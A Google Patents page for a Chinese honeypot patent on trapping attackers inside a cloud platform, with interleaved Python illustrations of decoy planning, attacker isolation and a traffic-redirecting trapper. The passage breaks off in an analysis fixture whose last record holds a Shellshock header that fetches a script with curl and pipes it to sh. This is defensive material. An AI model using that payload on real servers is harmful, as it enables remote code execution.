CN111541701A - Attack trapping method, device, equipment and computer readable storage medium - Google Patents


Info

Publication number
CN111541701A
Authority
CN
China
Prior art keywords
attack
trapping
attacker
address information
cloud platform
Prior art date
Legal status (The legal status is an assumption and is not a legal conclusion. Google has not performed a legal analysis and makes no representation as to the accuracy of the status listed.)
Granted
Application number
CN202010336360.4A
Other languages
Chinese (zh)
Other versions
CN111541701B (en)
Inventor
陈刚
Current Assignee (The listed assignees may be inaccurate. Google has not performed a legal analysis and makes no representation or warranty as to the accuracy of the list.)
Shanghai Hujing Information Technology Co ltd
Original Assignee
Shanghai Hujing Information Technology Co ltd
Priority date (The priority date is an assumption and is not a legal conclusion. Google has not performed a legal analysis and makes no representation as to the accuracy of the date listed.)
Filing date
Publication date
Application filed by Shanghai Hujing Information Technology Co ltd
Priority to CN202010336360.4A
Publication of CN111541701A
Application granted
Publication of CN111541701B
Legal status: Active
Anticipated expiration

Classifications

    • H: ELECTRICITY
    • H04: ELECTRIC COMMUNICATION TECHNIQUE
    • H04L: TRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
    • H04L63/00: Network architectures or network communication protocols for network security
    • H04L63/14: Network architectures or network communication protocols for network security for detecting or protecting against malicious traffic
    • H04L63/1441: Countermeasures against malicious traffic
    • H04L63/1491: Countermeasures against malicious traffic using deception as countermeasure, e.g. honeypots, honeynets, decoys or entrapment
    • H: ELECTRICITY
    • H04: ELECTRIC COMMUNICATION TECHNIQUE
    • H04L: TRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
    • H04L63/00: Network architectures or network communication protocols for network security
    • H04L63/14: Network architectures or network communication protocols for network security for detecting or protecting against malicious traffic
    • H04L63/1408: Network architectures or network communication protocols for network security for detecting or protecting against malicious traffic by monitoring network traffic
    • H04L63/1416: Event detection, e.g. attack signature detection
    • H: ELECTRICITY
    • H04: ELECTRIC COMMUNICATION TECHNIQUE
    • H04L: TRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
    • H04L63/00: Network architectures or network communication protocols for network security
    • H04L63/20: Network architectures or network communication protocols for network security for managing network security; network security policies in general

Landscapes

  • Engineering & Computer Science (AREA)
  • Computer Security & Cryptography (AREA)
  • Computer Hardware Design (AREA)
  • Computing Systems (AREA)
  • General Engineering & Computer Science (AREA)
  • Computer Networks & Wireless Communication (AREA)
  • Signal Processing (AREA)
  • Data Exchanges In Wide-Area Networks (AREA)
  • Computer And Data Communications (AREA)

Abstract

The invention discloses an attack trapping method, an attack trapping device, equipment and a computer readable storage medium, wherein the attack trapping method comprises the following steps: determining address information in the aggregation switch; determining idle target address information in the address information based on the address information in the aggregation switch, and configuring the target address information into address information of a fictitious host, wherein the fictitious host belongs to the trapping network system; when an attacker in the cloud platform equipment attacks the fictitious host based on the target address information, the attack behavior generated by the attacker is directed to the trapping network system to trap the attacker. The invention solves the technical problem that the network attack initiated from the internal equipment of the cloud platform is difficult to discover by the existing cloud platform network security solution.

Description

Attack trapping method, device, equipment and computer readable storage medium
Technical Field
The present invention relates to the field of network security technologies, and in particular, to an attack trapping method, apparatus, device, and computer-readable storage medium.
Background
A cloud platform, also called a cloud computing platform, is a service built on hardware and software resources that provides computing, network and storage capabilities. Cloud computing platforms can be divided into three classes: storage-type platforms centred on data storage, computing-type platforms centred on data processing, and comprehensive platforms that handle both computing and data storage. Because the equipment of a cloud platform holds massive amounts of highly important data, it is more likely to be attacked over the network and such attacks are serious; the current security posture of cloud platform equipment is worrying, so cloud platforms need to pay attention to security construction.
The existing cloud platform network security solution resembles traditional enterprise-level network security equipment: network security detection and filtering devices are connected in series at the gateway of the protected system to secure the internal devices of the cloud platform, mainly against the external network (DDoS defence, intrusion prevention (IPS), network anti-virus (AV), web page filtering, attack protection and the like). Such an architecture, however, has difficulty discovering and preventing network attacks launched through other channels or from the internal devices of the cloud platform.
The above is only for the purpose of assisting understanding of the technical aspects of the present invention, and does not represent an admission that the above is prior art.
Disclosure of Invention
The invention mainly aims to provide an attack trapping method, an attack trapping device, attack trapping equipment and a computer readable storage medium, and aims to solve the technical problem that the existing cloud platform network security solution is difficult to discover network attacks initiated from internal equipment of a cloud platform.
In order to achieve the above object, the present invention provides an attack trapping method, which is applied to a trapping network system, where the trapping network system accesses a cloud platform device through a convergence switch, and the attack trapping method includes the following steps:
determining address information in the aggregation switch;
determining idle target address information in the address information based on the address information in the aggregation switch, and configuring the target address information into address information of a fictitious host, wherein the fictitious host belongs to the trapping network system;
when an attacker in the cloud platform equipment attacks the fictitious host based on the target address information, the attack behavior generated by the attacker is directed to the trapping network system to trap the attacker.
Optionally, after the step of directing the attack behavior generated by the attacker to the trapping network system to trap the attacker when the attacker in the cloud platform device attacks the fictitious host based on the target address information, the method further includes:
determining the position of the attacker in the cloud platform equipment so as to determine target equipment corresponding to the attacker in the cloud platform equipment;
isolating the target device.
Optionally, when an attacker in the cloud platform device attacks the fictitious host based on the target address information, the step of directing attack behavior generated by the attacker to the trapping network system includes:
when an attacker in the cloud platform equipment attacks the fictitious host based on the target address information, the attack behavior generated by the attacker is directed to an application simulation system in the trapping network system so that the attacker attacks the application simulation system, and the application simulation system collects attack data generated when the attacker attacks the application simulation system.
Optionally, the persistent threat analysis system of the trapping network system receives attack data sent by the application simulation system, analyzes the attack data, and generates a data report corresponding to the attack data to record relevant attack information of the attacker.
Optionally, the persistent threat analysis system of the trapping network system receives attack data sent by the application simulation system, analyzes the attack data, generates alarm information, and outputs the alarm information.
Optionally, the persistent threat analysis system analyzes the attack data, and if suspicious data is detected to exist in the attack data, the suspicious data is sent to a sandbox of the trapping network system, so that the sandbox analyzes the suspicious data.
Optionally, the suspicious data includes suspicious code, and the sandbox receives the suspicious code sent by the persistent threat analysis system and executes the suspicious code to determine a degree of harm of the suspicious code.
Further, to achieve the above object, the present invention also provides an attack trapping apparatus comprising:
a determining module, configured to determine address information in the aggregation switch;
a configuration module, configured to determine, based on address information in the aggregation switch, idle target address information in the address information, and configure the target address information as address information of a fictitious host, where the fictitious host belongs to the trapping network system;
a trapping module, configured to direct the attack behavior generated by the attacker to the trapping network system and trap the attacker when the attacker in the cloud platform device attacks the fictitious host based on the target address information.
Further, to achieve the above object, the present invention also provides an attack trapping apparatus comprising: a memory, a processor and an attack trapping program stored on said memory and operable on said processor, said attack trapping program when executed by said processor implementing the steps of the attack trapping method as described above.
Furthermore, to achieve the above object, the present invention also provides a computer-readable storage medium having stored thereon an attack trapping program, which when executed by a processor, implements the steps of the attack trapping method as described above.
The invention determines the address information in the aggregation switch; determines, based on that address information, idle target address information and configures it as the address information of a fictitious host belonging to the trapping network system; and, when an attacker in the cloud platform equipment attacks the fictitious host based on the target address information, directs the attack behavior generated by the attacker to the trapping network system to trap the attacker. In this embodiment the idle address information in the aggregation switch is configured as the address information of fictitious hosts, so the address space of the aggregation switch is fully used and the trapping network system traps an attacker with a higher probability and more quickly, protecting the cloud platform device more effectively. When the host attacked by the attacker is a fictitious host, the trapping network system directs the attacker to itself and attracts the attacker to attack it, so the trapping network system can capture an attacker hidden in the cloud platform equipment. Network attacks from internal devices of the cloud platform, or initiated within the cloud platform, can thus be discovered, which solves the technical problem that such attacks are difficult for the existing cloud platform network security solution to discover.
Drawings
FIG. 1 is a schematic structural diagram of an attack trapping device of a hardware operating environment according to an embodiment of the present invention;
FIG. 2 is a schematic flow chart of a first embodiment of the attack trapping method according to the present invention;
fig. 3 is a schematic diagram of a trapping network system to which the attack trapping method of the present invention is applied.
The implementation, functional features and advantages of the objects of the present invention will be further explained with reference to the accompanying drawings.
Detailed Description
It should be understood that the specific embodiments described herein are merely illustrative of the invention and are not intended to limit the invention.
Fig. 1 is a schematic structural diagram of an attack trapping apparatus in a hardware operating environment according to an embodiment of the present invention.
The terminal of the embodiment of the invention can be a PC, and can also be a mobile terminal device with a display function, such as a smart phone, a tablet computer, an electronic book reader, a portable computer and the like.
As shown in fig. 1, the attack trapping apparatus may include: a processor 1001, such as a CPU, a network interface 1004, a user interface 1003, a memory 1005 and a communication bus 1002. The communication bus 1002 provides the connections between these components. The user interface 1003 may include a display screen (Display) and an input unit such as a keyboard (Keyboard), and may optionally also include a standard wired interface and a wireless interface. The network interface 1004 may optionally include a standard wired interface and a wireless interface (e.g., a Wi-Fi interface). The memory 1005 may be high-speed RAM or non-volatile memory (e.g., magnetic disk storage); alternatively, the memory 1005 may be a storage device separate from the processor 1001.
Optionally, the attack trapping device may further include a camera, a Radio Frequency (RF) circuit, a sensor, an audio circuit, a WiFi module, and the like.
It will be appreciated by those skilled in the art that the attack trap configuration shown in fig. 1 does not constitute a limitation of the attack trap and may include more or fewer components than shown, or some components in combination, or a different arrangement of components.
As shown in fig. 1, a memory 1005, which is a kind of computer storage medium, may include therein an operating system, a network communication module, a user interface module, and an attack trap program.
In the attack trapping apparatus shown in fig. 1, the network interface 1004 is mainly used for connecting to a background server and performing data communication with the background server; the user interface 1003 is mainly used for connecting a client (user side) and performing data communication with the client; and processor 1001 may be used to call an attack trap program stored in memory 1005.
In this embodiment, the attack trapping apparatus includes: a memory 1005, a processor 1001, and an attack trap program stored on said memory 1005 and executable on said processor 1001, wherein, when the processor 1001 calls the attack trap program stored in the memory 1005, the following operations are performed:
determining address information in the aggregation switch;
determining idle target address information in the address information based on the address information in the aggregation switch, and configuring the target address information into address information of a fictitious host, wherein the fictitious host belongs to the trapping network system;
when an attacker in the cloud platform equipment attacks the fictitious host based on the target address information, the attack behavior generated by the attacker is directed to the trapping network system to trap the attacker.
Further, processor 1001 may call an attack trap program stored in memory 1005, and also perform the following operations:
determining the position of the attacker in the cloud platform equipment so as to determine target equipment corresponding to the attacker in the cloud platform equipment;
isolating the target device.
Further, processor 1001 may call an attack trap program stored in memory 1005, and also perform the following operations:
when an attacker in the cloud platform equipment attacks the fictitious host based on the target address information, the attack behavior generated by the attacker is directed to an application simulation system in the trapping network system so that the attacker attacks the application simulation system, and the application simulation system collects attack data generated when the attacker attacks the application simulation system.
Further, processor 1001 may call an attack trap program stored in memory 1005, and also perform the following operations:
and analyzing the attack data, and generating a data report corresponding to the attack data so as to record the relevant attack information of the attacker.
Further, processor 1001 may call an attack trap program stored in memory 1005, and also perform the following operations:
and analyzing the attack data, generating alarm information and outputting the alarm information.
Further, processor 1001 may call an attack trap program stored in memory 1005, and also perform the following operations:
and analyzing the attack data, and if suspicious data is detected to exist in the attack data, sending the suspicious data to a sandbox of the trapping network system so that the sandbox can analyze the suspicious data.
Further, processor 1001 may call an attack trap program stored in memory 1005, and also perform the following operations:
when the suspicious data includes suspicious code, executing the suspicious code in the sandbox to determine the degree of harm of the suspicious code.
The invention also provides an attack trapping method, and referring to fig. 2, fig. 2 is a schematic flow chart of a first embodiment of the attack trapping method.
The attack trapping method provided by the invention is applied to a trapping network system, which may also be called a trapping-network active protection and detection system and is used to actively detect, trap and defend against attackers coming from the internal equipment of the cloud platform or from other channels. The trapping network system accesses the cloud platform equipment through an aggregation switch. As shown in the schematic diagram of fig. 3, the trapping network system comprises an active network trapper, a persistent threat analysis system, an application simulation system and a sandbox.
The active network trapper is a system built around an FPGA, with an external CPU for control. Using ARP spoofing, the active network trapper flexibly deploys a large number of fictitious hosts in each subnet segment of the network. Each fictitious host has its own address information, comprising a MAC address and an IP address, and is configured to open various ports so that it responds to all kinds of network scanning and sniffing requests.
When an intruding attacker accesses the address information of a fictitious host, the network trapper uses address translation to direct the attacker to the application simulation system of the trapping network system, so that the attacker's access traffic to the fictitious host is redirected to the application simulation system. At the same time, attack data is generated and sent to the persistent threat analysis system, which analyzes it. The attacker may be a network attack object such as a virus or a trojan horse, and the attack data comprises network session logs and mirrored data.
The application simulation system is a host with a real operating system and real applications. It may be a real cloud host, a system host, or a virtual cloud host that fully simulates the other services of the cloud platform, and it provides the attacker with a real environment so that the attack can proceed unhindered. While the attacker attacks the application simulation system, all of the attacker's behavior is recorded by the application simulation system and sent one-way to the persistent threat analysis system, which analyzes it. The application simulation system may be one or more PCs or industrial personal computers; in the cloud platform, it may be one or more virtual cloud hosts.
The persistent threat analysis system analyzes the attack data sent by the network trapper and the application simulation system, generates data reports and alarm information, and sends suspicious information captured in the attack data to the sandbox for analysis. The persistent threat analysis system may be a PC or an industrial personal computer; in the cloud platform, it may be a virtual cloud host.
The sandbox analyzes the suspicious information. For example, when the suspicious information is suspicious code, the sandbox executes the code, observes the resulting behavior inside the sandbox, and obtains an analysis result: whether the attacker is of a high degree of harm (such as a trojan horse virus) and the degree of harm of the attack behavior it generates. The analysis result is sent back to the persistent threat analysis system so that a log or an alarm can be generated.
In this embodiment, the attack trapping method includes the following steps:
step S10, determining address information in the aggregation switch;
In one embodiment, the trapping network system accesses the protected network through its network interface in order to exchange data with the real network devices; for example, it accesses the aggregation switch through the network interface and thereby reaches the protected network. The trapping network system accesses the cloud platform device through the aggregation switch, and the aggregation switch holds all the available address information of the network, that is, the address information of every network segment or sub-segment, including but not limited to MAC addresses and IP addresses. All available address information is therefore recorded in the aggregation switch: the address information occupied by cloud platform devices, and the unoccupied address information, which is the idle address information among all the available address information. Specifically, the trapping network system accesses the aggregation switch through a data transmission channel established between itself and the aggregation switch, and determines all the address information in the aggregation switch. Further, the trapping network system comprises an active network trapper, and the trapping network system accesses the aggregation switch through a data transmission channel established between the active network trapper and the aggregation switch to determine all the address information in the aggregation switch.
Furthermore, the address information in the aggregation switch can be determined by acquiring the address information configured in the trapping network system, and the address information in the aggregation switch can be acquired by the trapping network system self-learning the address information in the aggregation switch.
Step S20, based on the address information in the aggregation switch, determining the idle target address information in the address information, and configuring the target address information into the address information of a fictitious host, wherein the fictitious host belongs to the trapping network system;
in an embodiment, the address information in the aggregation switch includes all address information occupied by the cloud platform device and unoccupied idle address information, the trapping network system acquires the idle address information in real time from all the address information included in the aggregation switch, uses the idle address information as target address information, and configures the target address information into address information of a fictitious host in the trapping network system, so as to configure the idle address information in the aggregation switch into the address information of the fictitious host in real time. The purpose of configuring the idle address information in the aggregation switch into the address information of the fictitious host is to fully utilize the address information in the aggregation switch, so that the trapping network system traps the attacker with a higher probability, and the cloud platform equipment is protected more effectively.
Further, the trapping network system acquires the idle address information from all the address information contained in the aggregation switch in real time through the active network trapper, takes the idle address information as target address information, configures the target address information into the address information of the fictitious host in the trapping network system, and configures the idle address information in the aggregation switch into the address information of the fictitious host in real time. The active network trapper configures the idle address information in the aggregation switch into the address information of the fictitious hosts through an ARP spoofing technology, thereby flexibly releasing a large number of fictitious hosts in each subnet segment of the network, wherein the fictitious hosts have own address information and are set to open various different ports to respond to various network scanning and sniffing requests.
Step S30, when an attacker in the cloud platform device attacks the fictitious host based on the target address information, the attack behavior generated by the attacker is directed to the trapping network system to trap the attacker.
In an embodiment, when an attacker in the cloud platform device attacks the fictitious host, the attacker acquires any one of the target address information in the network and attacks the fictitious host pointed by the target address information. When the host attacked by the attacker belongs to the fictitious host, the network trapper in the trapping network system directs the attacker to the application simulation system in the trapping network system through an address translation technology to attract the attacker to attack the application simulation system in the trapping network system, so that the trapping network system can capture the attacker hidden in the cloud platform equipment.
Further, when the network trapper in the trapping network system directs the attacker to the application simulation system, the attacker's access traffic to the fictitious host is redirected to the application simulation system, so that the application simulation system captures the attacker's behavior. At the same time, attack data is generated and sent to the persistent threat analysis system for analysis. The attacker may be a network attack object such as a virus or a trojan horse, and the attack data comprises network session logs and mirrored data.
In the attack trapping method provided by this embodiment, the address information in the aggregation switch is determined; then, based on that address information, idle target address information is determined and configured as the address information of a fictitious host belonging to the trapping network system; finally, when an attacker in the cloud platform equipment attacks the fictitious host based on the target address information, the attack behavior generated by the attacker is directed to the trapping network system to trap the attacker. In this embodiment the idle address information in the aggregation switch is configured as the address information of fictitious hosts, so the address space of the aggregation switch is fully used and the trapping network system traps an attacker with a higher probability and more quickly, protecting the cloud platform device more effectively. When the host attacked by the attacker is a fictitious host, the trapping network system directs the attacker to itself and attracts the attacker to attack it, so the trapping network system can capture an attacker hidden in the cloud platform equipment. Network attacks from internal devices of the cloud platform, or initiated within the cloud platform, can thus be discovered, which solves the technical problem that such attacks are difficult for the existing cloud platform network security solution to discover.
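Steps S10 to S30 can be modelled as a small planning routine. The following Python is an added illustration written for this page, not code from the patent or from the assignee: it reads a stand-in for the aggregation switch's address table (S10), treats every host address of the segment that no real device holds as idle and assigns it to a fictitious host with its own constructed, locally administered MAC and a set of decoy ports (S20), and builds the address-translation map that sends traffic aimed at a decoy to the application simulation system (S30). The segment, the occupied addresses, the simulation host address and the MAC scheme are all constructed assumptions; the routine works for any segment because it uses the standard `ipaddress` module.

```python
"""Planning fictitious hosts from an aggregation switch's address table.

Added illustration, not the patent's code. Models steps S10-S30 of the
method: read the switch's address table, give every idle address to a
decoy, and translate traffic for decoys to the application simulation
system. Every address and port below is constructed.
"""
import ipaddress
from dataclasses import dataclass

# Constructed stand-in for the switch's address table (S10): one /28
# segment and the addresses already occupied by real cloud platform devices.
SEGMENT = ipaddress.ip_network("10.0.1.0/28")
OCCUPIED = {
    "10.0.1.1": "00:11:22:33:44:01",   # gateway
    "10.0.1.2": "00:11:22:33:44:02",   # real cloud host
    "10.0.1.5": "00:11:22:33:44:05",   # real cloud host
}
SIMULATION_HOST = "10.0.99.10"   # constructed address of the application simulation system
DECOY_OUI = "02:00:5e"           # locally administered prefix for decoy MACs (constructed)


@dataclass(frozen=True)
class Decoy:
    ip: str
    mac: str
    open_ports: tuple


def idle_addresses(segment, occupied):
    """S20: every usable host address in the segment that no real device holds."""
    return [str(ip) for ip in segment.hosts() if str(ip) not in occupied]


def decoy_mac(ip):
    """Derive a deterministic, locally administered MAC for a decoy (constructed scheme)."""
    octets = ip.split(".")
    return f"{DECOY_OUI}:{int(octets[1]):02x}:{int(octets[2]):02x}:{int(octets[3]):02x}"


def plan_decoys(segment, occupied, open_ports=(22, 80, 443, 3306)):
    """S20: assign each idle address to a fictitious host that answers on several ports."""
    return [Decoy(ip, decoy_mac(ip), open_ports) for ip in idle_addresses(segment, occupied)]


def build_redirect_table(decoys, simulation_host):
    """S30: address-translation map, decoy IP -> application simulation system."""
    return {d.ip: simulation_host for d in decoys}


def route(dst_ip, redirect_table):
    """Decide what the trapper does with a flow aimed at dst_ip.

    Traffic to a real device passes untouched; traffic to a decoy is
    translated to the simulation host and flagged so a session log starts.
    """
    if dst_ip in redirect_table:
        return {"action": "redirect", "to": redirect_table[dst_ip], "trapped": True}
    return {"action": "pass", "to": dst_ip, "trapped": False}


if __name__ == "__main__":
    decoys = plan_decoys(SEGMENT, OCCUPIED)
    table = build_redirect_table(decoys, SIMULATION_HOST)
    print(f"{len(decoys)} decoys cover the idle addresses of {SEGMENT}")
    print(route("10.0.1.7", table))   # decoy: redirected to the simulation host
    print(route("10.0.1.2", table))   # real host: passed through
```

In the /28 segment above, 14 host addresses exist and 3 are occupied, so 11 decoys are planned; a flow to any of those 11 addresses is the evidence the method relies on, because no legitimate workload has a reason to contact an address that was idle in the switch's table.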
Based on the first embodiment, a second embodiment of the method of the present invention is provided, where after step S30, the method further includes:
step a, determining the position of the attacker in the cloud platform equipment so as to determine target equipment corresponding to the attacker in the cloud platform equipment;
and b, isolating the target equipment.
In one embodiment, when the host attacked by the attacker is a fictitious host, the trapping network system directs the attacker to itself so as to lure the attacker into attacking the trapping network system. To attack the trapping network system, the attacker sends attack packets to it, and each attack packet carries the attacker's address information. The trapping network system receives the attack packet sent by the attacker, parses it to obtain the address information it contains, and thereby obtains the attacker's address information; from this it derives the attacker's position in the cloud platform device and determines the target device in which the attacker is hidden. Once the attacker's position is determined, the position information is sent to the management system of the cloud platform equipment, which determines the target device from that position information and isolates it from the other cloud platform devices, for example by disconnecting the target device's network connection, so that the attacker hidden in the target device cannot launch network attacks on other devices.
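Steps a and b reduce to an attribution lookup followed by a request to the management system. The Python below is an added illustration, not the patent's or the assignee's code: it takes the source address out of a trapped attack packet, maps it to a device through a constructed inventory (standing in for what the cloud platform's management system would provide), and emits the isolation request. It also covers the two cases the text leaves implicit: a packet aimed at a real host is not evidence and produces no action, and a source MAC that is not in the inventory cannot be isolated by device and is escalated instead of silently dropped. The inventory, decoy list, packets and device names are all constructed.

```python
"""Locating the attacker behind trapped traffic and isolating its device.

Added illustration, not the patent's code. Models steps a and b of the
second embodiment: read the attacker's source address from the attack
packet, map it to the cloud platform device it lives on, and hand the
management system an isolation request. Inventory and packets are constructed.
"""
from dataclasses import dataclass

# Constructed inventory of the cloud platform: source MAC -> device location.
# In a deployment this would be supplied by the platform's management system.
INVENTORY = {
    "00:11:22:33:44:02": {"device": "vm-web-01", "hypervisor": "node-a", "port": "Gi1/0/2"},
    "00:11:22:33:44:05": {"device": "vm-db-01", "hypervisor": "node-b", "port": "Gi1/0/5"},
}
DECOY_IPS = {"10.0.1.7", "10.0.1.9"}  # addresses of fictitious hosts (constructed)


@dataclass(frozen=True)
class AttackPacket:
    src_mac: str
    src_ip: str
    dst_ip: str
    dst_port: int


def locate_attacker(packet, inventory):
    """Step a: the packet's source address identifies the hidden attacker's device."""
    loc = inventory.get(packet.src_mac)
    if loc is None:
        return None
    return {"src_ip": packet.src_ip, **loc}


def isolation_request(packet, inventory, decoy_ips):
    """Step b: build the request sent to the management system.

    Only traffic aimed at a fictitious host counts as evidence. A source
    that is not in the inventory cannot be isolated by device, so it is
    escalated for manual handling rather than ignored.
    """
    if packet.dst_ip not in decoy_ips:
        return {"action": "none", "reason": "destination is not a fictitious host"}
    location = locate_attacker(packet, inventory)
    if location is None:
        return {"action": "escalate", "reason": "source MAC not in inventory",
                "src_ip": packet.src_ip}
    return {
        "action": "isolate",
        "device": location["device"],
        "hypervisor": location["hypervisor"],
        "port": location["port"],
        "evidence": f"{packet.src_ip} -> {packet.dst_ip}:{packet.dst_port}",
    }


if __name__ == "__main__":
    # Constructed packets: a compromised VM probing a decoy, an unknown
    # source probing a decoy, and ordinary traffic between two real hosts.
    for pkt in (
        AttackPacket("00:11:22:33:44:02", "10.0.1.2", "10.0.1.7", 22),
        AttackPacket("de:ad:be:ef:00:01", "10.0.1.13", "10.0.1.9", 445),
        AttackPacket("00:11:22:33:44:05", "10.0.1.5", "10.0.1.2", 3306),
    ):
        print(isolation_request(pkt, INVENTORY, DECOY_IPS))
```

Keying the lookup on the source MAC rather than the IP matters here because the trapper itself hands out IP addresses to decoys via ARP; the MAC observed on the aggregation switch port is the more stable link back to a physical or virtual device.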
Further, in an embodiment, the step of directing the attack behavior generated by the attacker to the trapping network system when an attacker in the cloud platform device attacks the fictitious host based on the target address information includes:
step c, when an attacker in the cloud platform device attacks the fictitious host based on the target address information, directing the attack behavior generated by the attacker to an application simulation system in the trapping network system, so that the attacker attacks the application simulation system, and the application simulation system collects the attack data generated while the attacker attacks it.
In an embodiment, an attacker in the cloud platform device attacks a fictitious host by obtaining one of the target addresses present in the network (for instance while scanning the segment) and attacking the host that address points to. Since no real host occupies that address, the host under attack is a fictitious host, and the network trapper in the trapping network system uses address translation to direct the attacker to the application simulation system in the trapping network system, luring the attacker into attacking the application simulation system so that the trapping network system can capture an attacker hidden in the cloud platform device.
Once the network trapper has directed the attacker to the application simulation system, the attacker attacks the application simulation system. The application simulation system monitors its own kernel and processes in real time and, while the attacker attacks it, collects the attack data generated by the attack. At the same time, the application simulation system sends the attack data to the persistent threat analysis system for analysis. The attacker may equally be an automated network attack object such as a virus or trojan, and the attack data includes network session logs, suspicious files and the like.
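The redirection and collection described above, as an added example that is not code from the patent: a userspace trapper accepts connections addressed to a fictitious host, relays them to the application simulation system and records a session record, which is the attack data handed on for analysis. The patent's trapper uses address translation; in production that is DNAT in the kernel or on the switch, and the relay below stands in for it so the whole path can be exercised on loopback. The echo service standing in for the application simulation system, the decoy address 10.20.0.2, the probe payload and the session fields are assumptions of the example.

```python
"""Network trapper: accept connections addressed to a fictitious host and relay
them to the application simulation system while recording the session.

Added illustration, not the patent's implementation. The echo service is a
constructed stand-in for the application simulation system; the relay stands
in for the address translation a real trapper performs.
"""
import socket
import threading
import time

PAYLOAD = b"GET /admin HTTP/1.0\r\nHost: 10.20.0.2\r\n\r\n"   # constructed attacker input


class Listener(threading.Thread):
    """Accept loop on an ephemeral loopback port; subclasses implement handle()."""
    def __init__(self):
        super().__init__(daemon=True)
        self.sock = socket.socket()
        self.sock.bind(("127.0.0.1", 0))   # a real trapper binds the decoy IP itself
        self.sock.listen(8)
        self.sock.settimeout(0.2)           # lets the loop notice stop()
        self.addr = self.sock.getsockname()
        self._stopping = threading.Event()

    def run(self):
        while not self._stopping.is_set():
            try:
                conn, peer = self.sock.accept()
            except socket.timeout:
                continue
            threading.Thread(target=self.handle, args=(conn, peer), daemon=True).start()

    def stop(self):
        self._stopping.set()
        self.join()
        self.sock.close()


class FakeService(Listener):
    """Constructed stand-in for the application simulation system: echoes input."""
    def handle(self, conn, peer):
        with conn:
            while chunk := conn.recv(4096):
                conn.sendall(chunk)


def _pump(src, dst, session, key):
    """Copy src -> dst, counting bytes and keeping the attacker's first bytes."""
    try:
        while chunk := src.recv(4096):
            if key == "bytes_in" and not session["first_bytes"]:
                session["first_bytes"] = chunk[:64]
            session[key] += len(chunk)
            dst.sendall(chunk)
    except OSError:
        pass
    finally:
        try:
            dst.shutdown(socket.SHUT_WR)    # propagate end-of-stream to the other side
        except OSError:
            pass


class Trapper(Listener):
    """Answers for the fictitious host and redirects the attacker to sim_addr."""
    def __init__(self, sim_addr, decoy="10.20.0.2"):
        super().__init__()
        self.sim_addr, self.decoy, self.sessions = sim_addr, decoy, []

    def handle(self, client, peer):
        session = {"attacker": peer[0], "attacker_port": peer[1], "decoy": self.decoy,
                   "bytes_in": 0, "bytes_out": 0, "first_bytes": b""}
        upstream = socket.create_connection(self.sim_addr)
        pumps = [threading.Thread(target=_pump, args=(client, upstream, session, "bytes_in")),
                 threading.Thread(target=_pump, args=(upstream, client, session, "bytes_out"))]
        for t in pumps:
            t.start()
        for t in pumps:
            t.join()
        client.close()
        upstream.close()
        self.sessions.append(session)   # attack data for the persistent threat analysis system


def probe(trapper, payload, wait=5.0):
    """Play the attacker: connect to the decoy listener, send, read the reply."""
    before = len(trapper.sessions)
    with socket.create_connection(trapper.addr) as s:
        s.sendall(payload)
        s.shutdown(socket.SHUT_WR)
        reply = b"".join(iter(lambda: s.recv(4096), b""))
    deadline = time.time() + wait
    while len(trapper.sessions) == before and time.time() < deadline:
        time.sleep(0.01)
    session = trapper.sessions[-1] if len(trapper.sessions) > before else None
    return reply, session


def run_demo(payload=PAYLOAD):
    """Bring up service and trapper on loopback, run one probe, tear down."""
    service = FakeService()
    service.start()
    trapper = Trapper(service.addr)
    trapper.start()
    try:
        return probe(trapper, payload)
    finally:
        trapper.stop()
        service.stop()


if __name__ == "__main__":
    reply, session = run_demo()
    print("reply from simulation system:", reply)
    print("session record:", session)
```

The attacker never learns that the reply came from somewhere other than the address it targeted, which is the point of the redirection; the session record, not the reply, is what the trapping network keeps.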
Further, in an embodiment, the persistent threat analysis system of the trapping network system receives the attack data sent by the application simulation system, analyzes it, and generates a data report corresponding to the attack data to record the relevant attack information of the attacker.
In one embodiment, the application simulation system sends the attack data to the persistent threat analysis system in the trapping network system; the persistent threat analysis system receives the attack data, analyzes it to obtain an analysis result, and stores the analysis result in a data report to record the relevant attack information of the attacker that attacked the application simulation system. The relevant attack information includes, but is not limited to, the location information of the attacker, the attack type, the attack process, the attack stage, the attack purpose and the degree of risk; this embodiment does not limit the relevant attack information.
Further, in an embodiment, the persistent threat analysis system of the trapping network system receives the attack data sent by the application simulation system, analyzes it, generates alarm information, and outputs the alarm information.
In one embodiment, the application simulation system sends the attack data to the persistent threat analysis system in the trapping network system; the persistent threat analysis system receives the attack data, analyzes it to obtain an analysis result, and stores the analysis result in a data report to record the relevant attack information of the attacker that attacked the application simulation system. At the same time, the persistent threat analysis system generates alarm information and sends it to the cloud platform device, so that the cloud platform can defend itself or check each cloud platform device, for example by checking the state of each cloud platform device to determine whether it has been attacked.
Further, in an embodiment, the persistent threat analysis system analyzes the attack data and, if it detects suspicious data in the attack data, sends the suspicious data to a sandbox of the trapping network system so that the sandbox can analyze it.
In one embodiment, the persistent threat analysis system receives the attack data sent by the application simulation system, analyzes it, and sends the suspicious information captured in the attack data to the sandbox so that the sandbox can analyze the suspicious information.
Further, the network trapper may also send attack data directly to the persistent threat analysis system. In that case the persistent threat analysis system likewise receives and analyzes the attack data from the network trapper and sends the suspicious information captured in it to the sandbox for analysis.
The persistent threat analysis system can therefore analyze attack data from both the network trapper and the application simulation system, and send the suspicious information captured in either to the sandbox for analysis.
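The analysis chain of the second embodiment and the paragraphs above (locate the attacker from the address information in the attack data, classify the attack stage, record a data report with the attack information, raise an alarm that isolates the target device, and hand suspicious files to the sandbox), as an added worked example that is not code from the patent. The session records, the cloud inventory that maps a tenant address to its VM, hypervisor and switch port, the detection patterns and the risk thresholds are all constructed for the example; the patent does not specify any of them.

```python
"""Persistent threat analysis over attack data from the trapping network.

Added illustration, not the patent's implementation. Session records, the
inventory and the heuristics are constructed; a real system takes the records
from the application simulation system / network trapper and the inventory
from the cloud management system.
"""
import hashlib
import re
from collections import defaultdict

# Constructed attack data: one record per session against a fictitious host.
SESSIONS = [
    {"src": "10.20.0.11", "decoy": "10.20.0.2", "port": 22, "payload": b""},
    {"src": "10.20.0.11", "decoy": "10.20.0.3", "port": 445, "payload": b""},
    {"src": "10.20.0.11", "decoy": "10.20.0.4", "port": 80, "payload": b""},
    {"src": "10.20.0.11", "decoy": "10.20.0.4", "port": 80,
     "payload": b"GET /cgi-bin/x HTTP/1.0\r\nUser-Agent: () { :; }; /bin/sh -c 'curl http://10.20.0.11/d.sh | sh'\r\n\r\n"},
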